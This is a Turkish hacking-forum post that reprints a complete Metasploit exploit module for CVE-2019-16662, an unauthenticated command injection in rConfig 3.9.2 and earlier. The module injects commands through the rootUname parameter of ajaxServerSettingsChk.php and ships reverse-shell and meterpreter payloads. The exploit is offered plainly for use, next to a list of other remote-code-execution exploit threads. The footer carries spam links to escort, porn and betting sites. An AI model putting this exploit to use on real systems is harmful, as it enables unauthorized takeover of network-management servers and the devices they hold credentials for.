[rootturkhacks.com~]
duyuru LiNK KISALTMAK / TEMA VEYA SCRiPT iSTEĞiNDE BULUNMAK YASAKTIR!
duyuru GiZLi iÇERiKLERE "asdafsdfsdf" TARZI YORUM YAPMAK BAN SEBEBIDIR !
hack forum

rConfig - install Command Execution Exploit

#1
rConfig - install Command Execution Exploit


Kod:
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::HttpClient
 include Msf::Exploit::CmdStager

 def initialize(info = {})
   super(update_info(info,
     'Name'           => 'rConfig install Command Execution',
     'Description'    => %q{
       This module exploits an unauthenticated command injection vulnerability
       in rConfig versions 3.9.2 and prior. The `install` directory is not
       automatically removed after installation, allowing unauthenticated users
       to execute arbitrary commands via the `ajaxServerSettingsChk.php` file
       as the web server user.

       This module has been tested successfully on rConfig version 3.9.2 on
       CentOS 7.7.1908 (x64).
     },
     'License'        => MSF_LICENSE,
     'Author'         =>
       [
         'mhaskar', # Discovery and exploit
         'bcoles'   # Metasploit
       ],
     'References'     =>
       [
         ['CVE', '2019-16662'],
         ['EDB', '47555'],
         ['URL', 'https://gist.github.com/mhaskar/ceb65fa4ca57c3cdccc1edfe2390902e'],
         ['URL', 'https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/']
       ],
     'Platform'       => %w[unix linux],
     'Arch'           => [ARCH_CMD, ARCH_X86, ARCH_X64],
     'Payload'        => {'BadChars' => "\x00\x0a\x0d\x26"},
     'Targets'        =>
       [
         ['Automatic (Unix In-Memory)',
           'Platform'       => 'unix',
           'Arch'           => ARCH_CMD,
           'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
           'Type'           => :unix_memory
         ],
         ['Automatic (Linux Dropper)',
           'Platform'       => 'linux',
           'Arch'           => [ARCH_X86, ARCH_X64],
           'DefaultOptions' => {'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'},
           'Type'           => :linux_dropper
         ]
       ],
     'Privileged'     => false,
     'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 },
     'DisclosureDate' => '2019-10-28',
     'DefaultTarget'  => 0))
   register_options(
     [
       OptString.new('TARGETURI', [true, 'The base path to rConfig install directory', '/install/'])
     ])
 end

 def check
   res = execute_command('id')

   unless res
     vprint_error 'Connection failed'
     return CheckCode::Unknown
   end

   if res.code == 404
     vprint_error 'Could not find install directory'
     return CheckCode::Safe
   end

   cmd_res = res.body.scan(%r{The root details provided have not passed: (.+?)<\\/}).flatten.first

   unless cmd_res
     return CheckCode::Safe
   end

   vprint_status "Response: #{cmd_res}"

   unless cmd_res.include?('uid=')
     return CheckCode::Detected
   end

   CheckCode::Vulnerable
 end

 def execute_command(cmd, opts = {})
   vprint_status "Executing command: #{cmd}"
   send_request_cgi({
     'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxServerSettingsChk.php'),
     'vars_get' => {'rootUname' => ";#{cmd} #"}
   }, 5)
 end

 def exploit
   unless [CheckCode::Detected, CheckCode::Vulnerable].include? check
     fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
   end

   case target['Type']
   when :unix_memory
     execute_command(payload.encoded)
   when :linux_dropper
     execute_cmdstager(:linemax => 1_500)
   end
 end
end

#  0day.today [2019-11-10]  #
imza
Kırık link ve kural ihlallerini ihbar ediniz
[Resim: QP9DEZ.jpg]
Alıntı


Benzer Konular...
Konu: Yazar Cevaplar: Gösterim: Son Mesaj
  QNAP QTS and Photo Station 6.0.3 - Remote Command Execution Exploit NasyoneL 0 3 05-31-2020, 09:30 PM
Son Mesaj: NasyoneL
  WordPress Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution Expl 0bir 0 10 05-28-2020, 04:36 PM
Son Mesaj: 0bir
  Pi-hole 4.4.0 - Remote Code Execution (Authenticated) Exploit 0bir 0 11 05-28-2020, 04:36 PM
Son Mesaj: 0bir
  OpenEMR 5.0.1 - Remote Code Execution Exploit 0bir 0 10 05-28-2020, 04:34 PM
Son Mesaj: 0bir
  Online Discussion Forum Site 1.0 - Remote Code Execution Vulnerability 0bir 0 10 05-28-2020, 04:34 PM
Son Mesaj: 0bir



Bu konuyu görüntüleyen kullanıcı(lar): 1 Ziyaretçi
brazzers premium accounts Istanbul escort Istanbul escort istanbul escort ankara escort istanbul escort eryaman escort etimesgut escort izmit escort En iyi bahis siteleri buca escort porno beylikdüzü escort eskişehir escort